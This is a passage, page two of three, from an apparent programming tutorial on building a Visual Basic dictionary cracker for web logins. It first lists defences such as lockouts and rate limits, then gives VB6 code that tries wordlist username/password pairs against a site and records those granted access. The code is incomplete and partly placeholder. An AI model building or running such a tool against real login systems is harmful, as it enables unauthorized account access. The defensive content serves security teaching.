Extranet/Intranet Dictionary Cracker in VB - Building the Cracker (Page 2 of 3 ) The important elements of conducting a dictionary attack are 1) sending multiple UID/PW combinations, 2) the rate of sending UID/PW combinations, and 3) the ‘Commonness’ of the UID/PW words. To defend against a dictionary attack, simply address any one of the elements above and the defending site will be significantly strengthened (disclaimer.h). In each element below, the defending server is an MS IIS Server; however, the concept arguments can be applied to any server. - To defend against multiple UID/PW combinations, use the Session variable to track 3 incorrect access attempts. On the next attempt within the Session automatically refuse access. In fact, even the correct UID/PW will be rejected in this scenario. When the Session times-out, the system resets and the user can again gain access with the correct UID/PW.
- The ‘rate’ of sending UID/PW addresses the number of attempts to login within a given period of time. After a user has failed 3 times, code the application to refuse login attempts for the next hour. The dictionary attack is dead as it would take ~ 6.8 YEARS to use the smallest 100 word library.
- ‘Common’ words: need I say more? To force users to use uncommon words or random characters, generate passwords for users. I don’t like that method, so I take new passwords and compared them against a word library. If the submitted PW is in the library then a different one is requested.
The VB6 code below is compiled into a simple .exe that takes parameters such as site address, UID and PW. Using a coma delimited .txt file of common words, the program sets a matrix of possible UID/PW combinations and sends them to the site for verification. The remote server’s response is analyzed to determine if access was granted. When the program is finished, a MsgBox is displayed with the UID/PW that were granted access. Public Function getDictionary(ByVal strURL As String,_
ByVal strMethod As String, ByVal strForm As String, _
ByVal strMatchNoEntry As String, ByVal UidLimitLen As Integer) As String
Dim mHTTP As Object, aryDictionary() As String
Dim fso As Object, TextStream As Object, S As String, ApplicationPath As String
ApplicationPath = App.Path & "\"
Set fso = CreateObject("Scripting.FileSystemObject")
Set TextStream = fso.OpenTextFile(ApplicationPath & "wordlist.txt", 1)
S = S & TextStream.ReadAll
TextStream.Close
DoEvents
getDictionary = getDictionaryAccess(strForm, UidLimitLen, oHTTP, strMatchNoEntry, aryDictionary)
End Function
Private Function getDictionaryAccess(ByVal Params As String, ByVal iSections As Integer,_
ByRef mHTTP As Object, ByVal strMatchNoEntry As String,_
ByRef aryDictionary() As String) As String
'Returns ";" delimited string of params
'assumes two params of username and password, the exact name value are passed in
'getDictionaryAccess = "uid=matt&pwd=1;uid=matt&pwd=2;10006=DTM&10007=1999"
'this guy will go 1, 2 and 3 characters against the Dictionary, then Dictionary against Dictionary
'the random attack does the 1 to 3 uid and pw matrix
Dim aryParams As Variant, strTemp As String, aryTemp() As String
Dim uid As Integer, pw As Integer, strResponse As String, strSomeAccessPoints As String
iSections = iSections + 1 'iSecitons allows control of word lenght
On Error Resume Next
For uid = 0 To UBound(aryDictionary)
For pw = 0 To UBound(aryDictionary)
If (Len(aryDictionary(uid)) < iSections) And (Len(aryDictionary(pw)) < iSections) Then
getDictionaryAccess = aryParams(0) & "=" & aryDictionary(uid) & "&" & _
aryParams(1) & "=" & aryDictionary(pw)
mHTTP engine method call
Call IMWaiting(mHTTP)
strResponse = mHTTP engine data retrieval
Call IMWaiting(mHTTP)
strResponse = Replace(strResponse, Chr(13), ";")
If (strResponse <> "") Then
If Not CBool(InStr(CStr(strResponse), CStr(strMatchNoEntry)) > 0) Then
'strSomeAccessPoints has the params that GRANTED ACCESS
strSomeAccessPoints = strSomeAccessPoints & aryDictionary(uid) & "," & aryDictionary(pw) & ";"
End If
End If
strResponse = ""
DoEvents
End If
Next
Next
On Error GoTo 0
getDictionaryAccess = strSomeAccessPoints
End FunctionNext: Conclusion >>
More Visual Basic Articles
More By Matt Burnett |
